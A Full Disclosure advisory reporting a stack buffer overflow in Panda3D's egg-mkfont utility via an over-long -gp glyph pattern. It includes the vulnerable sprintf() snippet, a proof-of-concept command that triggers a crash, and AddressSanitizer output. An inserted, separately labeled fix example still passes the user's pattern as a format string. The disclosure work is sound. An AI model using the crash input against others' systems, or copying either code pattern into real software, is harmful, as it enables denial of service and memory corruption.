Message-ID: <CAFmK-GzBREs3PQjnsPweMxDktNWr+i_MCujqqZwUiTcCNMeE+g@mail.gmail.com>
Date: Thu, 1 Jan 2026 03:31:52 -0500
From: Ron E <ronaldjedgerson@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Panda3d v1.10.16 egg-mkfont Stack Buffer Overflow

A stack-based buffer overflow vulnerability exists in the Panda3D
egg-mkfont utility due to the use of an unbounded sprintf() call with
attacker-controlled input. By supplying an excessively long glyph pattern
string via the -gp command-line option, an attacker can trigger a stack
buffer overflow, resulting in a deterministic crash of the egg-mkfont
process.

*Technical Details:*
The vulnerability occurs when egg-mkfont constructs output glyph filenames
using a fixed-size stack buffer and the unsafe sprintf() function. The
glyph pattern string (-gp option) is fully attacker-controlled and is not
length-checked prior to formatting.

*Vulnerable Code:*

    char buffer[1024];
    sprintf(buffer, _output_glyph_pattern.c_str(), character);

If the user supplies a glyph pattern string longer than the size of buffer,
sprintf() writes past the end of the stack buffer, corrupting adjacent
stack memory.

*Root Cause:*

   - Use of sprintf() instead of a bounded formatting function
   - Fixed-size stack buffer
   - Attacker-controlled input passed directly to formatting routine
   - No input length validation
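A bounded replacement for the pattern above, as an added example that is
not Panda3D's code or the advisory's: it keeps the same call shape (user
pattern as the format string, a character code as the argument) but refuses
over-long patterns up front and treats snprintf() truncation as an error.
The function name and the 1024-byte buffer size are assumptions.

```cpp
#include <cstddef>
#include <cstdio>
#include <string>

// Assumed buffer size, matching the advisory's fixed-size stack buffer.
constexpr std::size_t kGlyphNameBufSize = 1024;

// Unbounded version, mirroring the advisory's vulnerable pattern (do not use):
//   char buffer[1024];
//   sprintf(buffer, pattern.c_str(), character);
// Nothing limits the write to sizeof(buffer).

// Bounded version: validates the pattern length, formats with snprintf(), and
// refuses a truncated result instead of silently using a clipped name.
// Returns true on success and stores the expanded name in `out`.
// The pattern is still used as the format string, exactly as in the
// advisory's snippet; this example addresses only the missing bounds.
bool make_glyph_filename(const std::string &pattern, int character,
                         std::string &out) {
  // Input length validation: the expanded name is never shorter than the
  // pattern minus its conversion specifier, so an over-long pattern can be
  // rejected before any formatting happens.
  if (pattern.size() >= kGlyphNameBufSize) {
    return false;
  }

  char buffer[kGlyphNameBufSize];
  // snprintf() never writes more than sizeof(buffer) bytes, NUL included,
  // and returns the length the full output would have had.
  int needed = std::snprintf(buffer, sizeof(buffer), pattern.c_str(), character);
  if (needed < 0 || static_cast<std::size_t>(needed) >= sizeof(buffer)) {
    // Encoding error, or the expanded name did not fit: refuse rather than
    // proceed with a truncated filename.
    return false;
  }

  out.assign(buffer, static_cast<std::size_t>(needed));
  return true;
}
```

The 3000-byte pattern from the proof of concept below fails the length check
before snprintf() is ever called; a pattern that is just under the limit but
expands past it is caught by the truncation check instead.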

*Impact:*

   - *Denial of Service (DoS):* The egg-mkfont utility crashes reliably
   when provided with crafted input.
   - *Memory Corruption:* Stack memory beyond the intended buffer is
   overwritten.
   - Possible arbitrary code execution.

*Proof of Concept:*
./egg-mkfont \
  -gp "$(python3 - << 'EOF'
print("A" * 3000 + "%d")
EOF
)" \
  /usr/share/fonts/truetype/dejavu/DejaVuSans.ttf \
  out.egg

*Output:*
================================================================
==3237531==ERROR: AddressSanitizer: stack-buffer-overflow on address
0xfbff9e552880 at pc 0xffffb527bf2c bp 0xffffeae1dd60 sp 0xffffeae1d520
WRITE of size 3003 at 0xfbff9e552880 thread T0
    #0 0xffffb527bf28 in vsprintf
../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1726
    #1 0xffffb527d50c in __sprintf_chk
../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1774
    #2 0xaaaadab5a62c in sprintf
/usr/include/aarch64-linux-gnu/bits/stdio2.h:30
    #3 0xaaaadab5a62c in EggMakeFont::make_tref(PNMTextGlyph*, int)
/root/panda3d/pandatool/src/egg-mkfont/eggMakeFont.cxx:641
    #4 0xaaaadab64670 in EggMakeFont::get_tref(PNMTextGlyph*, int)
/root/panda3d/pandatool/src/egg-mkfont/eggMakeFont.cxx:629
    #5 0xaaaadab6584c in EggMakeFont::make_geom(PNMTextGlyph*, int)
/root/panda3d/pandatool/src/egg-mkfont/eggMakeFont.cxx:602
    #6 0xaaaadab69848 in EggMakeFont::run()
/root/panda3d/pandatool/src/egg-mkfont/eggMakeFont.cxx:476
    #7 0xaaaadab412c8 in main
/root/panda3d/pandatool/src/egg-mkfont/eggMakeFont.cxx:743
    #8 0xffffa04f2598 in __libc_start_call_main
../sysdeps/nptl/libc_start_call_main.h:58
    #9 0xffffa04f2678 in __libc_start_main_impl ../csu/libc-start.c:360
    #10 0xaaaadab422ec in _start
(/root/panda3d/build-asan/bin/egg-mkfont+0x6822ec) (BuildId:
71c2d66676c55693efa5c9aa3c9dbe806f4cdc00)

Address 0xfbff9e552880 is located in stack of thread T0 at offset 2176 in
frame
    #0 0xaaaadab5a4f8 in EggMakeFont::make_tref(PNMTextGlyph*, int)
/root/panda3d/pandatool/src/egg-mkfont/eggMakeFont.cxx:639
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
